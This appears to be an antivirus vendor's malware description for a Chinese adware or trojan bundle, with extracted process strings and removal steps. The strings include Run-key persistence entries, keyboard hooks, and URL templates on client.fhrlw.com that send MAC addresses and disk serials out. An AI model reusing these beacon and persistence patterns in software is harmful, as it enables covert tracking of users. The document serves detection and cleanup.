(http://www.eyuyan.com)

%original file name%.exe_1832_rwx_00566000_00002000:

kernel32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
rasapi32.dll
gdi32.dll
winmm.dll
winspool.drv
advapi32.dll
shell32.dll
ole32.dll
oleaut32.dll
comctl32.dll
ws2_32.dll
wininet.dll
comdlg32.dll
ShellExecuteA
InternetCanonicalizeUrlA
1.0.0.0
(http://www.eyuyan.com)

FhCalendar.exe_588:

.text
`.rdata
@.data
.rsrc
CNotSupportedException
CCmdTarget
CHttpFile
hhctrl.ocx
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
GetProcessWindowStation
USER32.DLL
operator
closeMiniUrl
closePopUrl
203.117.180.36
232,1!2@
e:\FhWork\Work\FhCalendar\Release\FhCalendar.pdb
KERNEL32.dll
GetKeyState
SetWindowsHookExW
UnhookWindowsHookEx
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
UrlUnescapeW
SHLWAPI.dll
oledlg.dll
DuiLib_u.dll
WINMM.dll
WS2_32.dll
IPHLPAPI.DLL
InternetCrackUrlW
InternetCanonicalizeUrlW
InternetOpenUrlW
WININET.dll
OLEACC.dll
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
CreateDialogIndirectParamW
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
WINSPOOL.DRV
COMDLG32.dll
RegCreateKeyExW
RegDeleteKeyW
RegOpenKeyW
RegEnumKeyW
.PAVCOleException@@
.PAVCException@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCCmdUI@@
.?AVCHttpFile@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCArchiveException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCFileException@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
zcÁ
.?AVCCmdTarget@@
.PAVCInternetException@@
.?AVCMiniWebWnd@@
.?AVCPopWebWnd@@
.?AVCMD5@@
.?AVCMD5File@@
5*5)5*5)5*5)5*5)5*5)5*5)5*5)5*5)5*5*5)*4
!>qMRqqq=jqq;q@!!%dpRBepZpqeGe2!!
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
ntdll.dll
kernel32.dll
%s%s.dll
A%s (%s:%d)
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
Acomctl32.dll
Acomdlg32.dll
Ashell32.dll
http://
@WININET.DLL
mfcm90u.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
user32.dll
accKeyboardShortcut
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
commctrl_DragListMsg
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
mscoree.dll
KERNEL32.DLL
xbasicSetting.xml
subdivis.db
timedate.cpl
http://www.fhrlw.com
Software\Microsoft\Windows\CurrentVersion\Run
S_11.png
S_22.png
clocknote_list_item.xml
{b}%s{/b}
%d-d-d d:d
pg1_operation_small
pg1_operation_big
{c #808080}%d-d-d d:d{/c}
index.png
index_1.png
clock_note_setting.xml
xfhnotetip.xml
menu.xml
Update.exe
Updatb.exe
Update_bak.exe
FMTest.exe
\FMDLL32.dll
FMDLL32.dll
GetMsgProc
xfh.xml
http://client.fhrlw.com/ad/shopping.html?id=%d
Skin\warn.wav
pg2_web
data.db
info.db
note.ini
%d-d-d
%d/d/d
%c%d%d%d
http://client.fhrlw.com/ad/fixad.html?id=%d
%s(%d/d/d)
clock_del_nor.png
clock_del_hov.png
clock_del_push.png
finish_nor.png
finish_hov.png
finish_push.png
%d-%d-%d
%c%d%d
jintian3.png
huangli.xml
%d-01-01
%s{n}
{c #ff0000}%d{/c}
{n}{c #ff0000}%s{/c}
http://client.fhrlw.com/Api/GetHoliday.ashx
http://client.fhrlw.com/Api/GetWeather.ashx?province=%s&city=%s
ohttp://client.fhrlw.com/Api/SendClickData.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s&date=%s&clickcount1=%d&clickcount2=%d&clickcount3=%d&clickcount4=%d
http://client.fhrlw.com/Api/Sendndays2openData.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s&ndays=%d
http://client.fhrlw.com/Api/getRightDownState.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s
http://client.fhrlw.com/Api/onlineLength.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s
http://client.fhrlw.com/api/GetConfig.ashx
xhlwnd.xml
EKey
dd
%s%s
%s%s
%Y-%m-%d %H:%M:%S
MiniWebWnd
xminiweb.xml
web_info
http://client.fhrlw.com/mini.html?id=%d
EPopWebWnd
xpopweb.xml
http://client.fhrlw.com/ad/popad.html?id=%d
\\.\PhysicalDrive%d
\\.\Scsi%d:
%%%2x
%Program Files%\fhrl\FhCalendar.exe
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
1.0.0.1
FhCalendar.exe

MSIB.tmp_916:

.text
`.rdata
@.data
.rsrc
@.reloc
KERNEL32.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
11.0.0.0
viewer.exe

SportLive.exe_908:

.text
.rdata
.data
.rsrc
.reloc
.aspack
.adata
Pht%D
CCmdTarget
CNotSupportedException
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
commctrl_DragListMsg
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
ntdll.dll
kernel32.dll
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
mfcm90.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
user32.dll
ole32.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
OLEACC.dll
\Liveconfig.ini
%A,%B,%d,%Y
D:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl
%s (%s:%d)
images\tab_bg.png
images\tabclose1.png
images\tabclose2.png
images\tabclose3.png
images\tab_item1.png
images\tab_item2.png
images\tab_item3.png
http://sport.yuejan.com/online/html/events/ad.html
http://sport.yuejan.com/online/html/events/event.html
sports.cntv.cn
tv.cntv.cn
apps.sports.cntv.cn
live.video.sina.com.cn/room/
Software\Microsoft\Windows\CurrentVersion\Run
KeyName=%s
\\.\PhysicalDrive%d
X-X-X-X-X-X
%Program Files%\xxss.ini
http://dif.9yfc.com/cloudy/iau.xhtml?op=active&st=1&ma=
CWebPage
F:\project\SprotLive\Release\
GetCPInfo
GetConsoleOutputCP
KERNEL32.dll
CreateDialogIndirectParamA
GetKeyState
UnhookWindowsHookEx
SetWindowsHookExA
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GDI32.dll
COMDLG32.dll
WINSPOOL.DRV
RegCreateKeyExA
RegCloseKey
RegOpenKeyExA
RegOpenKeyA
RegDeleteKeyA
RegEnumKeyA
ADVAPI32.dll
SHELL32.dll
COMCTL32.dll
SHLWAPI.dll
oledlg.dll
OLEAUT32.dll
gdiplus.dll
IPHLPAPI.DLL
GetProcessHeap
.?AVCCmdUI@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCObject@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCOleException@@
.PAVCOleDispatchException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCResourceException@@
.PAVCArchiveException@@
.PAVCFileException@@
zcÁ
.?AVCCmdTarget@@
.PAVCException@@
.?AVCWebPage@@
%Program Files%\xxdd\SportLive.exe
%Program Files%\xxdd\Liveconfig.ini
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
gdi32.dll
winspool.drv
advapi32.dll
shlwapi.dll
oleaut32.dll
iphlpapi.dll
accKeyboardShortcut
ekernel32.dll
mscoree.dll
KERNEL32.DLL
6.0.1
{8856F961-340A-11D0-A96B-00C04FD705A2}
(*.*)
1.0.1
SprotLive.exe

Wuji.exe_568:

.text
`.data
.rsrc
MSVBVM60.DLL
.Play78QQForm
.Play78QQButton
SHDocVwCtl.WebBrowser
#vb6chs.dll
shdocvw.dll
WebBrowser
D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
H:\WINDOWS\system32\shdocvw.oca
GetAsyncKeyState
shell32.dll
ShellExecuteA
DeleteUrlCacheEntryA
user32.dll
Wuji.ime
advapi32.dll
RegCreateKeyA
RegCloseKey
GetProcessHeap
kernel32.dll
H:\WINDOWS\system32\MSVBVM60.DLL\3
COMDLG32.DLL
FH:\WINDOWS\system32\stdole2.tlb
VBA6.DLL
Keys
All (*.*)| *.*
New_Key
http:///
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
http://www.miaoxia123.com
\Wuji.dat
Wuji.dat
\Show.dat
Show.dat
http://www.mi
a123.net/
gmts:\\.\ro
st.ex
install.php?login=
Email:[email protected] http://www.miaoxia123.com
*.TXT
|*.txt
onlinefirst.php?user=
\update.exe
WindowState
.commonDialog
.VBError
Windows 95 OSR2
Windows 95
Windows 98 SE
Windows 98
Windows ME
Windows 2000 Data center
Windows 2000 Advanced
Windows 2000
Windows Vista
Windows XP Professional
Windows XP Home
Windows XP
Windows Server 2003 Enterprise
Windows Server 2003 Data center
Windows Server 2003 Web Edition
Windows Server 2003 Standard
Windows Server 2003
Web Server Edition
Windows Vista Server 2008
Windows 7
6.2.9200
Windows 8
Windows 8.1
5.0.2195
Windows 2000
Windows
5.2.3790
Windows Other
000000000000
http://
online.php?user=


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    Wuji.exe:568
    FhCalendar.exe:452
    wujiime.exe:464
    MSIB.tmp:916
    xxdd_165.exe:452
    updroots.exe:1016
    114gglm_016.exe:488
    Update.exe:444
    fhrl_6_12001.exe:320
    fhsli_6_12001.exe:1852
    netsh.exe:436
    netsh.exe:628
    SportLive.exe:908
    MsiExec.exe:1760
    oemfhsli.exe:628

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\fixad[1].htm (1737 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetHoliday[1].ashx (876 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\SendClickData[1].ashx (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\picchange[1].css (584 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\sogou_icon_short[1].png (1421 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (977 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\qi[1].htm (162 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\picchange[1].js (908 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[1].js (376 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\82ea18df-b4ae-4b17-b1ab-46cba4b98343[1].jpg (19946 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\CAH4OJPH.htm (2844 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (1403 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (330 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\pixel[1].htm (6 bytes)
    %Program Files%\fhrl\note.ini (991 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\CAQJWRVK.htm (1684 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\924aed3e-a026-4cc3-996e-72927d75dda5[1].jpg (7278 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\jquery-1.3.2.min[1].js (36827 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\qi[1].htm (162 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetWeather[1].ashx (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[2].js (421 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\qi[2].htm (162 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\CAKPO1SZ.htm (3738 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (1952 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\48aaf3d6-f95f-4921-8a68-2606aed69a12[1].jpg (13306 bytes)
    %Program Files%\Wuji\Wuji.exe (7209 bytes)
    %Program Files%\Wuji\update.exe (7451 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\无极输入法\无极输入法.lnk (638 bytes)
    %Program Files%\Wuji\Wuji.dat (1945 bytes)
    %Program Files%\Wuji\uninst.exe (3685 bytes)
    %Documents and Settings%\%current user%\Desktop\无极输入法.lnk (626 bytes)
    %Program Files%\Wuji\Wuji.dll (2422 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\无极输入法\卸载无极输入法.lnk (479 bytes)
    %System%\catsrvuz.dll (53 bytes)
    %Program Files%\Wuji\Show.dat (5 bytes)
    %Program Files%\xxdd\Liveconfig.ini (22 bytes)
    %Program Files%\xxdd\xxdd.msi (146581 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wujiime.exe (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\version[1].txt (72 bytes)
    %Program Files%\fhrl\Update.log (402 bytes)
    %Program Files%\fhrl\fhUp\Update\version.ini (72 bytes)
    %Program Files%\fhrl\Skin\test\btn_push.png (263 bytes)
    %Program Files%\fhrl\Skin\test\clock_bk.png (2 bytes)
    %Program Files%\fhrl\Skin\test\菜单bk.png (1 bytes)
    %Program Files%\fhrl\Skin\test\确认按钮2态.png (1 bytes)
    %Program Files%\fhrl\Skin\test\劳动节.png (1 bytes)
    %Program Files%\fhrl\Skin\test\closetip_hov.png (4 bytes)
    %Program Files%\fhrl\Skin\test\xpopweb.xml (2 bytes)
    %Program Files%\fhrl\Skin\test\jsq_del_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\xhlwnd.xml (2 bytes)
    %Program Files%\fhrl\Skin\test\国庆节.png (508 bytes)
    %Program Files%\fhrl\Skin\test\equal_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\city_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\button_hover.png (792 bytes)
    %Program Files%\fhrl\Skin\test\finish_push.png (417 bytes)
    %Program Files%\fhrl\Skin\test\mini_bk.png (14 bytes)
    %Program Files%\fhrl\Skin\test\go_hov.png (2 bytes)
    %Program Files%\fhrl\Fhuninstall.exe (9178 bytes)
    %Program Files%\fhrl\Skin\test\教师节.png (545 bytes)
    %Program Files%\fhrl\Skin\test\ca_push.png (2 bytes)
    %Program Files%\fhrl\Skin\test\七夕节.png (930 bytes)
    %Program Files%\fhrl\Skin\test\go_nor.png (2 bytes)
    %Program Files%\fhrl\FMTest.exe (14713 bytes)
    %Program Files%\fhrl\huangli.xml (6456 bytes)
    %Program Files%\fhrl\Skin\test\finish_hov.png (413 bytes)
    %Program Files%\fhrl\Skin\test\shop_hov.png (2 bytes)
    %Program Files%\fhrl\Skin\test\closetip_push.png (4 bytes)
    %Program Files%\fhrl\Skin\test\input.png (3 bytes)
    %Program Files%\fhrl\Skin\test\back_push.png (2 bytes)
    %Program Files%\fhrl\Update.exe (17508 bytes)
    %Program Files%\fhrl\Skin\test\btn_mini_down.png (279 bytes)
    %Program Files%\fhrl\KillProc.exe (4255 bytes)
    %Program Files%\fhrl\Skin\test\calendar.png (7 bytes)
    %Program Files%\fhrl\Skin\test\day_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\Default\uninst_btn_uninstall.png (1392 bytes)
    %Program Files%\fhrl\Skin\test\setting_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\clocknote_list_item.xml (3 bytes)
    %Program Files%\fhrl\Skin\test\假.png (1 bytes)
    %Program Files%\fhrl\Skin\test\edit_nor.png (431 bytes)
    %Program Files%\fhrl\Skin\test\button_B_hover.png (613 bytes)
    %Program Files%\fhrl\Skin\test\clock_nor.png (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\风和日历\风和日历.lnk (686 bytes)
    %Program Files%\fhrl\uninst.exe (738 bytes)
    %Program Files%\fhrl\Skin\test\中秋节.png (1 bytes)
    %Program Files%\fhrl\Skin\test\shop_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\Combo_over.bmp (3 bytes)
    %Program Files%\fhrl\Skin\test\xfhnotetip.xml (1 bytes)
    %Program Files%\fhrl\FMDLL32.dll (14324 bytes)
    %Program Files%\fhrl\Skin\test\look_push.png (2 bytes)
    %Program Files%\fhrl\Skin\test\menu.xml (1 bytes)
    %Program Files%\fhrl\Skin\test\jsq_process.png (3 bytes)
    %Program Files%\fhrl\Skin\test\jia_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\Refresh_hover.png (1 bytes)
    %Program Files%\fhrl\Skin\test\clock_sel.png (2 bytes)
    %Program Files%\fhrl\Skin\test\tip_bk.png (2 bytes)
    %Program Files%\fhrl\Skin\test\equal_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\除夕.png (1 bytes)
    %Program Files%\fhrl\Skin\test\setting_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\Default\uninst_btn_back.png (1 bytes)
    %Program Files%\fhrl\Skin\warn.wav (314 bytes)
    %Program Files%\fhrl\subdivis.db (4 bytes)
    %Program Files%\fhrl\Skin\test\shop_sel.png (2 bytes)
    %Program Files%\fhrl\Skin\test\jsq_show.png (3 bytes)
    %Program Files%\fhrl\Update\version.ini (72 bytes)
    %Program Files%\fhrl\Skin\test\btn_mini_normal.png (1578 bytes)
    %Program Files%\fhrl\Skin\test\xminiweb.xml (2 bytes)
    %Program Files%\fhrl\Skin\test\js_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\clock_del_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\look_nor.png (2 bytes)
    %Program Files%\fhrl\Skin\test\jsq_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\index_1.png (2 bytes)
    %Program Files%\fhrl\Skin\Default\foembin.exe (12158 bytes)
    %Program Files%\fhrl\Skin\test\button_normal.png (676 bytes)
    %Program Files%\fhrl\Skin\test\xiala_1.png (1 bytes)
    %Program Files%\fhrl\Skin\test\元旦.png (2 bytes)
    %Program Files%\fhrl\Skin\test\btn_hot.png (1228 bytes)
    %Program Files%\fhrl\FhCalendar.exe (19232 bytes)
    %Program Files%\fhrl\Skin\Default\Skin.ini (1 bytes)
    %Program Files%\fhrl\Skin\test\圣诞节.png (873 bytes)
    %Program Files%\fhrl\Skin\test\js_sel.png (1 bytes)
    %Program Files%\fhrl\Skin\test\index.png (2 bytes)
    %Program Files%\fhrl\Skin\test\btn_close_highlight.png (475 bytes)
    %Program Files%\fhrl\Skin\test\ca_nor.png (2 bytes)
    %Program Files%\fhrl\Skin\Default\unist_btn_next.png (1350 bytes)
    %Program Files%\fhrl\Skin\test\感恩节.png (1 bytes)
    %Program Files%\fhrl\Skin\test\鬼节.png (913 bytes)
    %Program Files%\fhrl\Skin\test\假选中.PNG (3 bytes)
    %Program Files%\fhrl\Skin\test\xbasicsetting.xml (4 bytes)
    %Program Files%\fhrl\Skin\test\tip.png (1 bytes)
    %Program Files%\fhrl\Skin\test\jsq_del_hov.png (1 bytes)
    %Program Files%\fhrl\FMDLL.dll (14673 bytes)
    %Program Files%\fhrl\Skin\test\close_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\xiala_3.png (1 bytes)
    %Program Files%\fhrl\DuiLib_u.dll (10572 bytes)
    %Program Files%\fhrl\Skin\test\day_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\xfh.xml (1568 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\风和日历.lnk (692 bytes)
    %Program Files%\fhrl\Skin\test\scrollbar.bmp (1568 bytes)
    %Program Files%\fhrl\Skin\test\春节.png (1 bytes)
    %Documents and Settings%\All Users\Desktop\风和日历.lnk (674 bytes)
    %Program Files%\fhrl\Skin\test\dian.png (290 bytes)
    %Program Files%\fhrl\Skin\test\clock_del_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\back_nor.png (2 bytes)
    %Program Files%\fhrl\Skin\test\S_22.png (1 bytes)
    %Program Files%\fhrl\Skin\test\重阳节.png (2 bytes)
    %Program Files%\fhrl\Skin\Default\Controls.ini (285 bytes)
    %Program Files%\fhrl\Skin\Default\bin.ini (1 bytes)
    %Program Files%\fhrl\Skin\test\端午节.png (1 bytes)
    %Program Files%\fhrl\Skin\test\delapp1.png (1 bytes)
    %Program Files%\fhrl\Skin\test\close_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\del_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\new_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\logo.png (4 bytes)
    %Program Files%\fhrl\Skin\test\Festival.xml (1 bytes)
    %Program Files%\fhrl\Skin\Default\uninst_pic_top.png (1568 bytes)
    %Program Files%\fhrl\Skin\test\back_hov.png (2 bytes)
    %Program Files%\fhrl\Skin\test\清明节.png (1 bytes)
    %Program Files%\fhrl\Skin\test\js_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\equal_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\妇女节.png (1 bytes)
    %Program Files%\fhrl\Skin\test\父亲节.png (846 bytes)
    %Program Files%\fhrl\Skin\test\edit_push.png (432 bytes)
    %Program Files%\fhrl\Skin\test\儿童节.png (1 bytes)
    %Program Files%\fhrl\Skin\test\button_down.png (784 bytes)
    %Program Files%\fhrl\Skin\test\delapp.png (3 bytes)
    %Program Files%\fhrl\Skin\test\clock_hov.png (2 bytes)
    %Program Files%\fhrl\Skin\test\btn_close_normal.png (1682 bytes)
    %Program Files%\fhrl\Skin\test\愚人节.png (991 bytes)
    %Program Files%\fhrl\Skin\test\go_push.png (2 bytes)
    %Program Files%\fhrl\Skin\test\lunar.png (2 bytes)
    %Program Files%\fhrl\Skin\test\班选中.PNG (3 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Startup\风和日历.lnk (686 bytes)
    %Program Files%\fhrl\Skin\test\new_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\day_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\js_hov.png (2 bytes)
    %Program Files%\fhrl\Skin\test\logo_16icon.png (3 bytes)
    %Program Files%\fhrl\Skin\test\bg10.png (1568 bytes)
    %Program Files%\fhrl\Skin\test\默认.png (1 bytes)
    %Program Files%\fhrl\Skin\test\tip_content_bk.png (3 bytes)
    %Program Files%\fhrl\Skin\Default\line.png (2 bytes)
    %Program Files%\fhrl\Skin\test\scrollbar.png (1 bytes)
    %Program Files%\fhrl\Skin\test\shop_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\city_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\button_B_pushed.png (605 bytes)
    %Program Files%\fhrl\Skin\test\logo_mini.png (1 bytes)
    %Program Files%\fhrl\Skin\test\app_bk.png (2 bytes)
    %Program Files%\fhrl\Skin\test\menu_bk.png (3 bytes)
    %Program Files%\fhrl\Skin\test\jia_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\元宵节.png (1 bytes)
    %Program Files%\fhrl\Skin\test\scrollbar_o.png (1975 bytes)
    %Program Files%\fhrl\Skin\test\jsq_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\del_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\平安夜.png (1 bytes)
    %Program Files%\fhrl\Skin\test\finish_nor.png (425 bytes)
    %Program Files%\fhrl\Skin\test\ca_sel.png (2 bytes)
    %Program Files%\fhrl\Skin\test\jsq_res.png (3 bytes)
    %Program Files%\fhrl\Skin\test\默认选中.png (2 bytes)
    %Program Files%\fhrl\Skin\test\jintian3.png (3 bytes)
    %Program Files%\fhrl\Skin\test\layerClo.png (1 bytes)
    %Program Files%\fhrl\Skin\Default\btn_radio.png (1 bytes)
    %Program Files%\fhrl\Skin\test\确认按钮常态.png (1 bytes)
    %Program Files%\fhrl\Skin\test\button_B_normal.png (474 bytes)
    %Program Files%\fhrl\Skin\test\setting_push.png (1 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\风和日历\卸载风和日历.lnk (691 bytes)
    %Program Files%\fhrl\Skin\test\clock_del_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\chat_mid_bk.png (1308 bytes)
    %Program Files%\fhrl\Skin\test\closetip_nor.png (4 bytes)
    %Program Files%\fhrl\Skin\test\clock_note_setting.xml (8 bytes)
    %Program Files%\fhrl\Skin\test\Refresh_pushed.png (1 bytes)
    %Program Files%\fhrl\Skin\Default\uninst_btn_cancel.png (890 bytes)
    %Program Files%\fhrl\Skin\test\母亲节.png (1 bytes)
    %Program Files%\fhrl\Skin\test\S_11.png (1 bytes)
    %Program Files%\fhrl\Skin\test\look_hov.png (2 bytes)
    %Program Files%\fhrl\Skin\Default\uninst_btn_close.png (2 bytes)
    %Program Files%\fhrl\Skin\test\bord_bk.png (3 bytes)
    %Program Files%\fhrl\Skin\test\Combo_nor.bmp (3 bytes)
    %Program Files%\fhrl\Skin\test\btn_mini_highlight.png (1440 bytes)
    %Program Files%\fhrl\Skin\test\btn_close_down.png (1098 bytes)
    %Program Files%\fhrl\Skin\test\班.png (1 bytes)
    %Program Files%\fhrl\Skin\test\jsq_hov.png (1 bytes)
    %Program Files%\fhrl\Skin\test\close_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\情人节.png (1 bytes)
    %Program Files%\fhrl\Skin\Default\uninst_btn_check.png (3 bytes)
    %Program Files%\fhrl\Skin\test\edit_hov.png (429 bytes)
    %Program Files%\fhrl\Skin\test\clock_push.png (2 bytes)
    %Program Files%\fhrl\Skin\test\光棍节.png (536 bytes)
    %Program Files%\fhrl\Skin\test\Refresh_normal.png (1 bytes)
    %Program Files%\fhrl\Skin\test\jsq_del_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\xiala_2.png (1 bytes)
    %Program Files%\fhrl\Skin\test\del_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\jia_push.png (1 bytes)
    %Program Files%\fhrl\Skin\test\ca_hov.png (2 bytes)
    %Program Files%\fhrl\Skin\test\new_nor.png (1 bytes)
    %Program Files%\fhrl\Skin\test\weather_bk.png (15 bytes)
    %Program Files%\fhrl\Skin\test\friend_list_item.xml (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\System.dll (10 bytes)
    %Program Files%\Common Files\Install\fhrlsli\info.ini (996 bytes)
